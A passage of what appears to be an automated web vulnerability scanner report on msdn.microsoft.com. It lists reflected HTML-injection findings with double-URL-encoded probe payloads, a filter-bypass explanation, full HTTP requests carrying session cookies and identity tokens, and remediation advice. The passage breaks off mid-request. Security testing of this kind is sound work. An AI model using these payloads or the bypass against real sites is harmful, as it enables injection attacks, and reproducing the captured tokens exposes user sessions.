17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10038
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms123402(l=MSDN.10).aspx?missingurl=/en-us/library/dd582938(v/x3doffice.11&92bbc"><a>62955b61670=1" />
...[SNIP]...

2.63. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6483a%2522%253e%253ca%253e8800823c465 was submitted in the REST URL parameter 1. This input was echoed as 6483a"><a>8800823c465 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us6483a%2522%253e%253ca%253e8800823c465/library/dd582938(v=office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us6483a"><a>8800823c465/library/dd582938(v=office.11" />
...[SNIP]...

2.64. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d55f6%2522%253e%253ca%253efdd48321b4d was submitted in the REST URL parameter 2. This input was echoed as d55f6"><a>fdd48321b4d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryd55f6%2522%253e%253ca%253efdd48321b4d/dd582938(v=office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryd55f6"><a>fdd48321b4d/dd582938(v=office.11" />
...[SNIP]...

2.65. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e49d%2522%253e%253ca%253e35d14fe12fc was submitted in the REST URL parameter 3. This input was echoed as 6e49d"><a>35d14fe12fc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(v6e49d%2522%253e%253ca%253e35d14fe12fc=office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v6e49d"><a>35d14fe12fc=office.11" />
...[SNIP]...

2.66. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8440%2522%253e%253ca%253e0f47febd4eb was submitted in the REST URL parameter 1. This input was echoed as c8440"><a>0f47febd4eb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usc8440%2522%253e%253ca%253e0f47febd4eb/library/dd582938(v=office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:22 GMT
Content-Length: 9200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usc8440"><a>0f47febd4eb/library/dd582938(v=office.11)" />
...[SNIP]...

2.67. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efc86%2522%253e%253ca%253e3e864514c0b was submitted in the REST URL parameter 2. This input was echoed as efc86"><a>3e864514c0b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryefc86%2522%253e%253ca%253e3e864514c0b/dd582938(v=office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:57:54 GMT
Content-Length: 9200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryefc86"><a>3e864514c0b/dd582938(v=office.11)" />
...[SNIP]...

2.68. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v=office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14105%2522%253e%253ca%253e4aaafa655d was submitted in the REST URL parameter 3. This input was echoed as 14105"><a>4aaafa655d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(v14105%2522%253e%253ca%253e4aaafa655d=office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
